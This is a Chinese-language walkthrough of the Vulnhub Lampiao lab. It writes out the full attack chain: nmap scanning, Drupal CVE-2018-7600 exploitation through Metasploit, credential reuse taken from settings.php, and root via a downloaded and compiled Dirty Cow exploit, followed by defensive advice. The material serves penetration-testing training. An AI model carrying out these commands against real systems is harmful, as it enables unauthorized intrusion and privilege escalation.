vulnhub|渗透测试lampiao
字数 1297 2025-08-29 08:32:24
Vulnhub靶机Lampiao渗透测试教学文档
环境准备
靶机信息
网络配置
- 攻击机(Kali Linux) IP: 10.10.10.128
- 靶机IP: 10.10.10.129 (通过DHCP自动分配)
渗透测试步骤
1. 主机发现
使用nmap进行主机扫描:
nmap -sP 192.168.107.1/24
确认靶机IP为10.10.10.129
2. 端口扫描
初始扫描常用端口:
nmap -sS 10.10.10.129
仅发现22端口开放,但SSH弱口令爆破未成功。
全面扫描所有端口:
nmap -p- 10.10.10.129
发现1898端口开放Web服务。
3. Web服务枚举
访问http://10.10.10.129:1898进行信息收集
目录扫描
使用御剑扫描工具发现:
- /robots.txt
- /CHANGELOG.txt
从CHANGELOG.txt确认网站使用Drupal 7.54框架
4. 漏洞利用
搜索Drupal相关漏洞:
msfconsole
msf > search drupal
发现CVE-2018-7600远程代码执行漏洞
使用Metasploit利用该漏洞:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 10.10.10.129
set RPORT 1898
run
成功获取www-data权限的shell
5. 获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
6. 信息收集与横向移动
在网站目录中发现可疑文件:
- audio.m4a: 提示用户tiago
- lampiao.jpg
- LuizGonzaga-LampiaoFalou.mp3
- qrc.png (扫描结果为鼓励信息)
在/var/www/html/sites/default/settings.php中发现数据库凭据:
- 用户名: tiago
- 密码: [从配置文件中获取]
尝试SSH登录tiago用户成功
7. 数据库访问
发现MySQL root密码与tiago用户密码相同,成功访问MySQL:
mysql -u root -p
查看drupal数据库获取网站用户信息
8. 权限提升
内核提权
检查内核版本:
uname -a
发现系统为Ubuntu 14.04.5 (2016年8月),存在脏牛(Dirty Cow)漏洞(CVE-2016-5195)
下载并编译漏洞利用代码:
wget https://www.exploit-db.com/download/40847.cpp -O dirtycow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtycow.cpp -lutil
./dcow -s
成功获取root权限
9. 获取flag
cd /root
cat flag.txt
关键知识点总结
-
全面端口扫描:使用
-p-参数扫描所有65535个端口,避免遗漏非常规服务端口 -
CMS漏洞利用:
- Drupal CVE-2018-7600远程代码执行漏洞
- 使用Metasploit模块快速利用已知漏洞
-
权限提升技术:
- 通过配置文件泄露获取数据库和系统凭据
- 脏牛漏洞利用流程:下载→编译→执行
- 内核漏洞利用条件:版本匹配+有编译环境
-
信息收集技巧:
- 检查robots.txt和CHANGELOG.txt等标准文件
- 分析网站配置文件获取敏感信息
- 检查非常规文件(如音频、图片)中可能隐藏的线索
-
工具使用:
- nmap全面扫描
- Metasploit框架利用已知漏洞
- gcc编译本地提权利用代码
防御建议
- 及时更新CMS系统和插件
- 限制配置文件的访问权限
- 使用最小权限原则运行服务
- 定期更新操作系统内核
- 监控非常规端口的开放情况
- 避免在配置文件中硬编码敏感信息